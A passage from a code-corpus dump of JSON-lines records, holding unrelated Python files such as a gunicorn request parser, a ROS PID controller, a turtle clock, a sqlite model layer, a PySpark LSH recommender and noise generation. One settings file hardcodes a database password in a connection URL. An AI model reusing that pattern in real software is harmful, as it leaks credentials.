Body(ChunkedReader(self, self.unreader))\n elif response_length is not None:\n self.body = Body(LengthReader(self.unreader, response_length))\n else:\n self.body = Body(EOFReader(self.unreader))\n\n def should_close(self):\n for (h, v) in self.headers:\n if h == \"CONNECTION\":\n v = v.lower().strip()\n if v == \"close\":\n return True\n elif v == \"keep-alive\":\n return False\n break\n return self.version <= (1, 0)\n\n\nclass Request(Message):\n def __init__(self, unreader):\n self.methre = re.compile(\"[A-Z0-9$-_.]{3,20}\")\n self.versre = re.compile(\"HTTP/(\\d+).(\\d+)\")\n \n self.method = None\n self.uri = None\n self.scheme = None\n self.host = None\n self.port = 80\n self.path = None\n self.query = None\n self.fragment = None\n\n super(Request, self).__init__(unreader)\n\n\n def get_data(self, unreader, buf, stop=False):\n data = unreader.read()\n if not data:\n if stop:\n raise StopIteration()\n raise NoMoreData(buf.getvalue())\n buf.write(data)\n \n def parse(self, unreader):\n buf = StringIO()\n\n self.get_data(unreader, buf, stop=True)\n \n # Request line\n idx = buf.getvalue().find(\"\\r\\n\")\n while idx < 0:\n self.get_data(unreader, buf)\n idx = buf.getvalue().find(\"\\r\\n\")\n self.parse_request_line(buf.getvalue()[:idx])\n rest = buf.getvalue()[idx+2:] # Skip \\r\\n\n buf = StringIO()\n buf.write(rest)\n \n \n # Headers\n idx = buf.getvalue().find(\"\\r\\n\\r\\n\")\n\n done = buf.getvalue()[:2] == \"\\r\\n\"\n while idx < 0 and not done:\n 
self.get_data(unreader, buf)\n idx = buf.getvalue().find(\"\\r\\n\\r\\n\")\n done = buf.getvalue()[:2] == \"\\r\\n\"\n \n if done:\n self.unreader.unread(buf.getvalue()[2:])\n return \"\"\n\n self.headers = self.parse_headers(buf.getvalue()[:idx])\n\n ret = buf.getvalue()[idx+4:]\n buf = StringIO()\n return ret\n \n def parse_request_line(self, line):\n bits = line.split(None, 2)\n if len(bits) != 3:\n raise InvalidRequestLine(line)\n\n # Method\n if not self.methre.match(bits[0]):\n raise InvalidRequestMethod(bits[0])\n self.method = bits[0].upper()\n\n # URI\n self.uri = bits[1]\n parts = urlparse.urlsplit(bits[1])\n self.scheme = parts.scheme or ''\n self.host = parts.netloc or None\n if parts.port is None:\n self.port = 80\n else:\n self.host = self.host.rsplit(\":\", 1)[0]\n self.port = parts.port\n self.path = parts.path or \"\"\n self.query = parts.query or \"\"\n self.fragment = parts.fragment or \"\"\n\n # Version\n match = self.versre.match(bits[2])\n if match is None:\n raise InvalidHTTPVersion(bits[2])\n self.version = (int(match.group(1)), int(match.group(2)))\n\n def set_body_reader(self):\n super(Request, self).set_body_reader()\n if isinstance(self.body.reader, EOFReader):\n self.body = Body(LengthReader(self.unreader, 0))\n\n\n","sub_path":"gunicorn/http/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"602214259","text":"#!/usr/bin/env python\n\nimport rospy\nfrom control.msg import drive_param\nfrom control.msg import pid_input\nfrom std_msgs.msg import Bool\n\nclass Pid(object):\n\tdef __init__(self):\n\t\t# Params\n\t\tself.kp = 2\n\t\tself.kd = 0.1\n\t\tself.prev_error = 0.0\n\t\tself.go = True\n\n\t\t# Publisher\n\t\tself.pub = rospy.Publisher('control/drive_parameters', drive_param, queue_size=1)\n\n\t\t# Subscribers\n\t\trospy.Subscriber('control/error', pid_input, self.control)\n\t\trospy.Subscriber('control/go', Bool, self.go_callback)\n\n\t\trospy.loginfo(\"Started pid_controller\\nListening to /control/error and /control/go\")\n\t\trospy.spin()\n\n\tdef control(self, data):\n\t\t## Your code goes here\n\t\t# 1. Scale the error\n\t\t# 2. Apply the PID equation on error\n\t\t# 3. 
Make sure the error is within bounds\n\n\n\n\n\n\t\tmsg = drive_param()\n\t\tmsg.velocity = data.pid_vel\n\t\terror = data.pid_error\n\t\tangle_p = error * self.kp\n\t\tangle_d = self.kd * (error-self.prev_error)\n\t\tangle = angle_p+angle_d\n\t\tself.prev_error = error\n\t\tmsg.angle = angle\n\t\tif not self.go:\n\t\t\tmsg.velocity = 0.0\n\t\tself.pub.publish(msg)\n\t\trospy.loginfo(\"\\nvel: %.0lf\\ngo: %i\", msg.velocity, self.go)\n\n\tdef go_callback(self, msg):\n\t\tself.go = msg.data\n\t\trospy.loginfo(\"\\nEntered go_callback\\ngo: %i\", self.go)\n\nif __name__ == '__main__':\n\trospy.init_node('pid_controller', anonymous=True)\n\tmy_node = Pid()\n","sub_path":"src/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"268492014","text":"'''\r\nCreated on Sep 24, 2019\r\n\r\n@author: jou\r\n'''\r\n\r\nimport csv\r\nimport os\r\nimport datetime\r\nfrom xml.dom import minidom\r\n\r\ndef get_variables(mydoc_xml):\r\n    print(\"extracting variables ...\")\r\n\r\n    # create CSV-file---------------------------------------------------------------------------------------------------\r\n    dirpath = os.getcwd()\r\n\r\n    if not os.path.exists(dirpath + '/results/'):\r\n        os.mkdir(dirpath + \"/results\")\r\n\r\n    if os.path.isfile(dirpath + \"/results/variables_genesys.csv\"):\r\n        extract_time = str(datetime.datetime.now())\r\n        extract_time = extract_time.replace(':', '-')\r\n        save_path = dirpath + '/results/variables_genesys_' + extract_time[2:19] + '.csv'\r\n    else:\r\n        save_path = dirpath + '/results/variables_genesys.csv'\r\n\r\n    # extract the required data from Genesys----------------------------------------------------------------------------\r\n    mydoc = mydoc_xml\r\n    converters = mydoc.getElementsByTagName('converter')\r\n    storages = mydoc.getElementsByTagName('storage')\r\n    lines = mydoc.getElementsByTagName('tr-converter')\r\n\r\n    number_of_converters = len(converters)\r\n    number_of_storage = len(storages)\r\n    number_of_lines = len(lines)\r\n    number_of_variables = sum([number_of_converters,number_of_storage,number_of_lines])\r\n\r\n    # write the data to the CSV file------------------------------------------------------------------------------------\r\n    with open(save_path, 'w', newline='') as csvfile:\r\n        filewriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)\r\n        # write one value per column instead of a single pre-joined string\r\n        filewriter.writerow(['Number of variables', '#', str(number_of_variables)])","sub_path":"conversion_skripts/ConvertInputGenesys/lib/result_variables.py","file_name":"result_variables.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"412219649","text":"import time\r\nimport datetime as dt \r\nimport turtle \r\n\r\nt = turtle.Turtle()\r\nt1 = turtle.Turtle()\r\n\r\ns = turtle.Screen()\r\ns.bgcolor(\"white\")\r\n\r\nsec = dt.datetime.now().second\r\nmin = dt.datetime.now().minute\r\nhr = dt.datetime.now().hour\r\n\r\nt1.pensize(5)\r\nt1.color('purple')\r\n\r\nt1.goto(-20,0)\r\nt1.pendown()\r\n\r\nfor i in range(2):\r\n    t1.forward(200)\r\n    t1.left(90)\r\n    t1.forward(70)\r\n    t1.left(90)\r\n\r\nt1.hideturtle()\r\nwhile True:\r\n    t.hideturtle()\r\n    t.clear()\r\n\r\n    t.write(str(hr).zfill(2)+\":\"+str(min).zfill(2)+\":\"+str(sec).zfill(2),font=(\"Arial Narrow\", 35, \"bold\"))\r\n\r\n    # advance the time once per second; this block must run inside the loop\r\n    time.sleep(1)\r\n    sec+=1\r\n\r\n    if sec == 60:\r\n        sec=0\r\n        min+=1\r\n\r\n    if min == 60:\r\n        min=0\r\n        hr+=1\r\n\r\n    if hr == 13:\r\n        hr=1","sub_path":"Digital_Clock.py","file_name":"Digital_Clock.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"450746348","text":"import sqlite3\nfrom nanoAPI.utils import err, msg\nfrom .model import Model\n\n\nclass DB:\n    def __init__(self):\n        self.server = sqlite3.connect('database.db')\n        self.admin = self.server.cursor()\n        self.models = []\n\n    def set_models(self, *args):\n        self.models.extend(args)\n        for model in self.models:\n            model.table_name = model.__name__.lower()\n\n    def is_booted(self):\n        is_booted = False\n        for model in self.models:\n            self.admin.execute(\n                f\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{model.__name__.lower()}'\")\n            if self.admin.fetchone()[0]:\n                is_booted = True\n        return is_booted\n\n    def boot(self):\n        fields = \"id INTEGER PRIMARY KEY AUTOINCREMENT\"\n        for model in self.models:\n            print(\"\\n\", msg(\"BOOT\", f\"Model {model.__name__}\"))\n            if issubclass(model, Model):\n                for field in model.get_fields():\n                    fields = fields + \", \" + field.command\n                    print(f\"\\t - {field.name}\")\n                try:\n                    self.admin.execute(\n                        f\"CREATE TABLE IF NOT EXISTS {model.table_name} ({fields})\")\n                except sqlite3.OperationalError as sql_err:\n                    print(\n                        err(model.__name__, f\"{str(sql_err)}\"))\n                fields = \"id INTEGER PRIMARY KEY AUTOINCREMENT\"\n            else:\n                print(\n                    err(model.__name__, f\"Models must be an instance of *nanoAPI.db.model.Model*\"))\n        self.server.commit()\n\n    def __del__(self):\n        self.admin.close()\n        self.server.close()\n","sub_path":"nanoAPI/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187424883","text":"\"\"\"\nCopyright 2016 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport time\nimport logging\n\nfrom cafe.drivers.unittest.decorators import tags\n\nfrom cloudcafe.blockstorage.volumes_api.common.models import statuses as \\\n    volume_statuses\nfrom cloudcafe.common.tools.datagen import rand_name\nfrom cloudcafe.compute.common.types import NovaServerStatusTypes\nfrom cloudcafe.compute.composites import ComputeAdminComposite\n\nfrom cloudroast.compute.fixtures import ServerFromVolumeV2Fixture\n\n\nclass ServerFromVolumeWithAttachmentsMigrateTests(ServerFromVolumeV2Fixture):\n\n    @classmethod\n    def setUpClass(cls):\n        \"\"\" Create and migrate a server from volume with multiple attachments\n\n        The following resources are created during this setup:\n            - Create an active server.\n        \"\"\"\n        super(ServerFromVolumeWithAttachmentsMigrateTests, cls).setUpClass()\n\n        cls.create_server()\n\n        # The base class create_server method adds the server resource to the\n        # resources pool by default which will attempt to delete the\n        # server during class tear down. 
This resource pool check will attempt\n # to confirm that the server is deleted prior to the resource pool\n # attempting deleting the other resources created below.\n cls.resources.add(cls.server.id, cls.confirm_server_deleted)\n\n num_volumes_to_attach = 2\n cls.attached_volumes = list()\n\n for i in range(num_volumes_to_attach):\n # Create a volume\n volume = cls.compute_integration.volumes.behaviors.\\\n create_available_volume(\n cls.compute_integration.volumes.config.\n default_volume_type_min_size,\n cls.compute_integration.volumes.config.default_volume_type,\n rand_name('live_migrate_volume'))\n cls.resources.add(volume.id_, cls.delete_volume)\n cls.compute_integration.volume_attachments.behaviors.\\\n attach_volume_to_server(cls.server.id, volume.id_)\n cls.attached_volumes.append(volume)\n\n # Migrate and wait for ACTIVE status\n compute_admin = ComputeAdminComposite()\n compute_admin.servers.client.migrate_server(cls.server.id)\n compute_admin.servers.behaviors.wait_for_server_status(\n cls.server.id, NovaServerStatusTypes.VERIFY_RESIZE)\n compute_admin.servers.client.confirm_resize(cls.server.id)\n compute_admin.servers.behaviors.wait_for_server_status(\n cls.server.id, NovaServerStatusTypes.ACTIVE)\n # Allow the server additional time to complete the migration processes\n # prior to performing tests\n time.sleep(30)\n\n @classmethod\n def confirm_server_deleted(cls, server_id):\n \"\"\" Confirm the server resource has been deleted\n\n This method will attempt to confirm the server resource created\n during setup has been deleted. If confirmation fails or times out,\n the id of the server will be logged.\n\n Args:\n server_id: The id of the server that would have been deleted.\n\n Returns:\n None\n \"\"\"\n try:\n cls.compute.servers.behaviors.\\\n confirm_server_deletion(server_id=server_id,\n response_code=404)\n except Exception as e:\n cls.fixture_log.log(logging.WARNING, str(e))\n\n @classmethod\n def delete_volume(cls, volume_id):\n \"\"\" Delete the volumes created during setup\n\n This method will attempt to detach and delete all volumes created\n and attached during setup. If a either detaching or deleting fails\n or times out without being confirmed, the id of the volume will be\n logged.\n\n Args:\n volume_id: The id of the volume being deleted\n\n Returns:\n None\n \"\"\"\n\n if volume_id in [volume.id_ for volume in cls.attached_volumes]:\n try:\n cls.compute_integration.volume_attachments.behaviors.\\\n delete_volume_attachment(volume_id, cls.server.id)\n except Exception as e:\n cls.fixture_log.log(logging.WARNING, str(e))\n\n if not cls.compute_integration.volumes.behaviors.\\\n delete_volume_confirmed(volume_id):\n cls.fixture_log.log(logging.WARNING,\n \"Volume {0} either was not deleted during \"\n \"clean up procedures or the confirm \"\n \"deletion operation timed out.\".\n format(volume_id))\n\n @tags(type='smoke', net='yes')\n def test_server_volumes_attached(self):\n \"\"\" Test that a servers attached volumes have the status of \"in-use\"\n\n Get the details of the volumes created and attached during the\n setup. 
Validate that the status of the volume is 'in-use'.\n\n The following assertions occur:\n - The status of all of the volumes created and attached\n during setup have a status of 'in-use'\n \"\"\"\n volumes_not_attached = list()\n for volume in self.attached_volumes:\n volume_after_migration = self.compute_integration.volumes.\\\n behaviors.get_volume_info(volume.id_)\n if volume_after_migration.status != volume_statuses.Volume.IN_USE:\n volumes_not_attached.append(volume_after_migration)\n\n self.assertEqual(len(volumes_not_attached), 0,\n msg=\"One or more volume attachments were not \"\n \"attached to the server with id {0}. Unattached \"\n \"Volumes: {1}\".format(\n self.server.id, volumes_not_attached))\n","sub_path":"cloudroast/compute/integration/volumes/boot_from_volume/admin_api/v2/test_migrate_server_with_attachments.py","file_name":"test_migrate_server_with_attachments.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184650295","text":" \n\ndef __print_chiptableX(hs_tables):\n #print(hs_tables.execstr('hs_tables'))\n #exec(hs_tables.execstr('hs_tables'))\n cx2_gx = hs_tables.cx2_gx\n cx2_cid = hs_tables.cx2_cid\n cx2_nx = hs_tables.cx2_nx\n cx2_theta = hs_tables.cx2_theta\n cx2_roi = hs_tables.cx2_roi\n #prop_names = ','.join(px2_propname)\n print('=======================================================')\n print('# Begin ChipTableX')\n print('# ChipID, NameX, ImgX, roi[tl_x tl_y w h], theta')\n chip_iter = iter(zip(cx2_cid, cx2_nx, cx2_gx, cx2_roi, cx2_theta))\n for (cid, nx, gx, roi, theta) in chip_iter:\n print('%8d, %5d, %5d, %25s, %6.3f' % (cid, nx, gx, str(roi).replace(',',''), theta))\n print('# End ChipTableX')\n print('=======================================================')\n\ndef print_chiptable(hs_tables):\n #exec(hs_tables.execstr('hs_tables'))\n #print(hs_tables.execstr('hs_tables'))\n #prop_names = ','.join(px2_propname)\n print('=======================================================')\n print('# Begin ChipTable')\n # Get length of the max vals for formating\n cx2_cid = hs_tables.cx2_cid\n cx2_theta = hs_tables.cx2_theta\n cx2_gname = [hs_tables.gx2_gname[gx] for gx in hs_tables.cx2_gx]\n cx2_name = [hs_tables.nx2_name[nx] for nx in hs_tables.cx2_nx]\n cx2_stroi = [str(roi).replace(',','') for roi in hs_tables.cx2_roi]\n max_gname = max([len(gname) for gname in iter( cx2_gname)])\n max_name = max([len(name) for name in iter( cx2_name) ])\n max_stroi = max([len(stroi) for stroi in iter( cx2_stroi)])\n _mxG = str(max([max_gname+1, 5]))\n _mxN = str(max([max_name+1, 4]))\n _mxR = str(max([max_stroi+1, 21]))\n\n fmt_str = '%8d, %'+_mxN+'s, %'+_mxG+'s, %'+_mxR+'s, %6.3f'\n\n c_head = '# ChipID'\n n_head = ('%'+_mxN+'s') % 'Name'\n g_head = ('%'+_mxG+'s') % 'Image'\n r_head = ('%'+_mxR+'s') % 'roi[tl_x tl_y w h]'\n t_head = ' theta'\n header = ', '.join([c_head,n_head,g_head,r_head,t_head])\n print(header)\n\n # Build the table\n chip_iter = iter(zip( cx2_cid, cx2_name, cx2_gname, cx2_stroi, cx2_theta))\n for (cid, name, gname, stroi, theta) in chip_iter:\n _roi = str(roi).replace(',',' ') \n print(fmt_str % (cid, name, gname, stroi, theta))\n\n print('# End ChipTable')\n print('=======================================================')\n\n\n@helpers.unit_test\ndef test_load_csv():\n db_dir = params.DEFAULT\n hs_dirs, hs_tables = load_csv_tables(db_dir)\n print_chiptable(hs_tables)\n __print_chiptableX(hs_tables)\n print(hs_tables.nx2_name)\n print(hs_tables.gx2_gname)\n 
hs_tables.printme2(val_bit=True, max_valstr=10)\n    return hs_dirs, hs_tables\n\n\n@helpers.__DEPRICATED__\ndef get_sv_test_data(qcx=0, cx=None):\n    return get_test_data(qcx, cx)\n\n","sub_path":"_graveyard/load_data_graveyard.py","file_name":"load_data_graveyard.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533738997","text":"import os\nimport cv2\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom lib import encode_rle\n\ndef create_dataset(path):\n    '''Create dataset with names of images and code of their masks.\n\n    Parameters\n    ----------\n    path: str\n        Path to data with images.\n    \n    Return\n    ----------\n    data_df: DataFrame object (pandas.core.frame.DataFrame)\n    \n    '''\n    masks_d = []\n    masks = os.listdir(path+'_mask')\n    for i in masks:\n        img,mask = i[:-4]+'.jpg', np.array(Image.open(path+'_mask/'+i))\n        masks_d.append([img,encode_rle(mask)])\n    return pd.DataFrame(masks_d)\n\n\n\ndef from_image_to_array(data, path):\n    '''\n    \n    PARAMETERS\n    ----------\n    data: pd.DataFrame\n        Original data (test, valid images)\n    path: str\n        Path to data with images.\n    \n    RETURN\n    ---------\n    names: list of str\n    img: np.array\n    '''\n    \n    names = []\n    arrays = []\n\n    for i in data.sort_values(0).iloc[:,0].values:\n        names.append(i)\n        img = cv2.imread(path+i)\n        img = cv2.resize(img, (256,256))\n        arrays.append(img)\n    img = np.array(arrays)/ 255.\n    \n    return names, img","sub_path":"human_segmentation/functions/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"165834892","text":"from .defaults import * # noqa\nfrom .utils import parse_database_url\n\nLEVEL = 'development'\n\nDATABASE_URL = (\n    'postgres://betterbeauty:W8zSrpqUkFzReUqT@127.0.0.1:5432/betterbeauty'\n)\n\n# Setup default database connection from Database URL\nDATABASES = {\n    'default': parse_database_url(DATABASE_URL),\n}\n\nDEBUG = True\n\nFB_APP_ID = ''\nFB_APP_SECRET = ''\n","sub_path":"webapp/betterbeauty/core/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"83353425","text":"# program that reads a username and a password and does not accept a password equal to the username,\n# showing an error message and asking for the information again\n\n\nusuario = input('Enter the username: ')\nsenha = input('Enter the password: ')\n\n\nwhile (senha == usuario):\n    print('\\nERROR: username and password cannot be the same!\\n')\n    usuario = input('enter the username: ')\n    senha = input('enter the password: ')\n\nif (senha != usuario):\n    print('\\n#########################')\n    print('Account Created Successfully\\n')\n    print('YOUR LOGIN IS: ', usuario, '\\nYOUR PASSWORD IS: ', senha)\n","sub_path":"questao0.py","file_name":"questao0.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"118446263","text":"'''\nCreated on Jan 21, 2015\n\n@author: hijungshin\n'''\n\nfrom figure import Figure\nimport sys\nimport cv2\nimport util\nfrom visualobjects import VisualObject\nimport numpy as np\nfrom writehtml import WriteHtml\n\nif __name__ == \"__main__\":\n    objdir = sys.argv[1]\n    list_of_objs = VisualObject.objs_from_file(\"None\", objdir)\n    \n    linetxt = sys.argv[2]\n    line_ids = util.stringlist_from_txt(linetxt)\n    line_ids = 
util.strings2ints(line_ids)\n    \n    panorama = sys.argv[3]\n    \n    n_figures = len(np.unique(np.array(line_ids)))\n    figuredir = objdir + "/figure_test"\n    list_of_figures = Figure.getfigures(list_of_objs, line_ids, figuredir)\n    \n    html = WriteHtml(objdir + "/figures_test.html", "Figures")\n    html.figure(panorama, width="800", caption="panorama view")\n    html.opentable(border = 1)\n    for i in range(0, n_figures):\n        html.opentablerow()\n        figure_i = []\n        for fig in list_of_figures:\n            if fig.main_id == i:\n                figure_i.append(fig)\n        \n        j = 0\n        for fig in figure_i:\n            html.opentablecell()\n            html.figure(fig.newobjpath, width="300", caption="Figure%i-%i"%(i, j))\n            j += 1\n            html.closetablecell()\n        html.closetablecell()\n    html.closetable()\n    html.closehtml()\n    ","sub_path":"Scripts/annotation_test.py","file_name":"annotation_test.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"376362406","text":"# \"This Is Coding Test for Employment\", p.226\n# Efficient currency composition\n\nn,m = map(int, input().split())\n\narr = []\nfor i in range(n) : arr.append(int(input()))\n\nd = [10001]*(m+1)\n\nd[0] = 0\nfor i in range(n) : \n    for j in range(arr[i],m+1) : \n        if d[j-arr[i]] != 10001 : \n            d[j] = min(d[j], d[j-arr[i]]+1)\nif d[m] == 10001 : \n    print(-1)\nelse : print(d[m])","sub_path":"DP/효율적인화폐구성.py","file_name":"효율적인화폐구성.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"264265728","text":"import enum\n\nclass NestOpCmd(enum.Enum):\n\tGATHER = 'GATHER'\n\tKERBEROAST = 'KERBEROAST'\n\tSMBSESSIONS = 'SMBSESSIONS'\n\tPATHSHORTEST = 'PATHSHORTEST'\n\tPATHDA = 'PATHDA'\n\tGETOBJINFO = 'GETOBJINFO'\n\tCHANGEAD = 'CHANGEAD'\n\tLISTADS = 'LISTADS'\n\tOK = 'OK'\n\tERR = 'ERR'\n\tLOG = 'LOG'\n\tLISTGRAPHS = 'LISTGRAPHS'\n\tCHANGEGRAPH = 'CHANGEGRAPH'\n\tTCPSCAN = 'TCPSCAN'\n\tTCPSCANRES = 'TCPSCANRES'\n\tLISTADSRES = 'LISTADSRES'\n\tPATHRES = 'PATHRES'\n\tGATHERSTATUS = 'GATHERSTATUS'\n\tUSERRES = 'USERRES'\n\tCOMPUTERRES = 'COMPUTERRES'\n\tSMBSESSIONRES = 'SMBSESSIONRES'\n\tSMBSHARERES\t= 'SMBSHARERES'\n\tSMBLOCALGROUPRES = 'SMBLOCALGROUPRES'\n\tLOADAD = 'LOADAD'\n\tGROUPRES = 'GROUPRES'\n\t\n\n","sub_path":"jackdaw/nest/ws/protocol/cmdtypes.py","file_name":"cmdtypes.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"18422025","text":"import sys\nfrom itertools import combinations\nfrom pyspark.sql import SparkSession\nimport operator\nimport csv\n\ndef min_hash(values):\n    sign = []\n    for i in range(1, 51):\n        hash_list = []\n        for v in values:\n            h_value = (3*v + 11*i) % 100\n            hash_list.append(h_value)\n        sign.append(min(hash_list))\n    return sign\n\ndef band(item):\n    band = []\n    for i in range(0, 10):\n        band.append((i, (item[0], item[1][i])))\n    return band\n\ndef candidate(input):\n    result = []\n    permutations = list(combinations(input, 2))\n    for each in permutations:\n        u1 = each[0]\n        u2 = each[1]\n        if operator.eq(u1[1],u2[1]):\n            candi = tuple([u1[0], u2[0]])\n            reverse_candi = tuple([u2[0], u1[0]])\n            result.append(candi)\n            result.append(reverse_candi)\n    return result\n\ndef top3_user(item):\n    m1 = users_dict[item[0]]\n    simi_dict = {}\n    top3 = []\n    for each in item[1]:\n        m2 = users_dict[each]\n        inter = set(m1).intersection(set(m2))\n        # Jaccard similarity needs the union of BOTH users' baskets\n        union = set(m1).union(set(m2))\n        simi = float(len(inter)/len(union))\n        simi_dict[simi]=each\n    # take the three LARGEST similarities, so sort in descending order\n    l = sorted(simi_dict.keys(), reverse=True)[0:3]\n    for each in l:\n        top3.append(simi_dict[each])\n    return (item[0], top3)\n\ndef rating_dict(values):\n    d = {}\n    for each in values:\n        d[each[0]]=each[1]\n    return d\ndef predict_movies(item):\n    u1 = ratings_dict[item[0]].keys()\n    pred_movies = []\n    for each in item[1]:\n        u2 = ratings_dict[each].keys()\n        diff = set(u2).difference(set(u1))\n        pred_movies.extend(list(diff))\n    pred_movies = list(set(pred_movies))\n    pred_ratings = {}\n    for i in pred_movies:\n        pred_ratings[i] = []\n        for each in item[1]:\n            if i in ratings_dict[each].keys():\n                pred_ratings[i].append(ratings_dict[each][i])\n            else:\n                continue\n    return (int(item[0]), pred_ratings)\ndef average_rating(values):\n    for each in values:\n        values[each] = float(sum(values[each])/len(values[each]))\n    values = sorted(values.items(),key=lambda item:item[0])\n    return values\nif __name__ == \"__main__\":\n\t\n    spark = SparkSession \\\n        .builder \\\n        .appName(\"LSH\") \\\n        .getOrCreate()\n    sc = spark.sparkContext\n\n    lines = sc.textFile(sys.argv[1])\n    header = lines.first()\n    data = lines.filter(lambda x: x != header).map(lambda x: x.split(',')).collect()\n    rdd = sc.parallelize(data)\n    baskets = rdd.filter(lambda x: x != header) \\\n        .map(lambda x: (x[0],int(x[1]))) \\\n        .groupByKey()\\\n        .map(lambda x: (x[0],list(x[1]))).collect()\n    signiture = sc.parallelize(baskets).mapValues(lambda values: min_hash(values))\n    signiture = signiture.mapValues(lambda values: [values[i:i+5] for i in range(0, 50, 5)]).collect()\n\n    bands = sc.parallelize(signiture).flatMap(lambda x: band(x)).groupByKey().map(lambda x:(x[0], list(x[1]))).collect()\n\n    users_dict = {}\n    for each in baskets:\n        users_dict[each[0]]=each[1]\n\n\n    candidates = sc.parallelize(bands).mapValues(lambda values: candidate(values)).flatMap(lambda x: x[1]).distinct().groupByKey().map(lambda x: (x[0], list(x[1]))).collect()\n    top3_simi = sc.parallelize(candidates).map(lambda x: top3_user(x)).collect()\n    ratings = rdd.map(lambda x: (x[0],(int(x[1]), float(x[2])))) \\\n        .groupByKey()\\\n        .map(lambda x: (x[0],list(x[1]))).mapValues(lambda v: rating_dict(v)).collect()\n\n    ratings_dict = {}\n    for each in ratings:\n        ratings_dict[each[0]]=each[1]\n\n    predicting = sc.parallelize(top3_simi).map(lambda x: predict_movies(x)).mapValues(lambda x : average_rating(x)).sortByKey().collect()\n\n\n    f = open(sys.argv[2], 'w')\n    csv_writer = csv.writer(f)\n    csv_writer.writerow(['user', 'movie', 'rating'])\n    for i in range(len(predicting)):\n        for each in predicting[i][1]:\n            csv_writer.writerow([predicting[i][0], each[0], each[1]])\n    f.close()\n","sub_path":"lsh.py","file_name":"lsh.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"55839843","text":"import numpy as np\nfrom math import sin, cos, pi, sqrt, ceil, floor, log\n\ndef build_landscape(width, height, octaves=6, scaling=1.8, seed=-1):\n    landscape = np.zeros((width, height))\n\n    # octaves limited if grid is too small\n    octaves = min(floor(log(min(width, height), scaling))-1, octaves)\n    print(octaves)\n    scale = min(width, height) # scale = size of features\n    amplitude = 1\n    for octave in range(octaves):\n        # octave_intensity = noise_2d(width, height, width, height, seed=seed) * amplitude\n        # amplitude = noise_2d(width, height, width, height, seed=seed)\n        amplitude = 0.6 ** octave\n        landscape = landscape * (1 - amplitude) + noise_2d(width, height, scale, scale, seed=seed) * amplitude\n        scale /= scaling\n    return landscape\n    \ndef 
noise_2d(width, height, period_width, period_height, seed=-1):\n # ensure everything is an integer\n width //= 1\n height //=1\n period_width //=1\n period_height //=1\n\n # set the seed if one is set\n if seed != -1:\n np.random.seed(seed)\n\n coarse_i_count = ceil(width / period_width)\n coarse_j_count = ceil(height / period_height)\n\n # The 2D course-grid matrix of random unit vectors, which defines the grid, with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], with subarray [vector-x, vector-y]\n coarse_grid = np.random.rand(coarse_i_count + 1, coarse_j_count + 1) * 2 * pi\n coarse_grid = np.array([[coarse_grid[:-1, :-1], coarse_grid[1:, :-1]],\n [coarse_grid[:-1, 1: ], coarse_grid[1:, 1: ]]])\n coarse_grid = np.array([np.cos(coarse_grid), np.sin(coarse_grid)]).transpose(3, 4, 2, 1, 0)\n # generate fine grid by repeating coarse grid to fill space\n fine_coarse_grid = np.repeat(np.repeat(coarse_grid, period_width, axis=0), period_height, axis=1)\n\n # create a left-to-right gradient in fine grid dimensions\n h_step = 1/period_width\n v_step = 1/period_height\n fine_grid_gradient_up, fine_grid_gradient_left = np.mgrid[1-h_step/2 : 0 : -h_step, 1-v_step/2 : 0 : -v_step]\n\n # The 2D fine-grid weighting matrix for interpolation, with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], and vector subarray [vector-x, vector-y] (vector-x = vector-y)\n weighting_fine_grid = fine_grid_gradient_left * fine_grid_gradient_up\n weighting_fine_grid = np.array([\n [\n [weighting_fine_grid[: , :], weighting_fine_grid[: , ::-1]], # upper-left and upper-right weightings\n [weighting_fine_grid[::-1, :], weighting_fine_grid[::-1, ::-1]] # lower-left and lower-right weightings\n ],] * 2\n ).transpose(3, 4, 1, 2, 0)\n weighting_fine_grid = 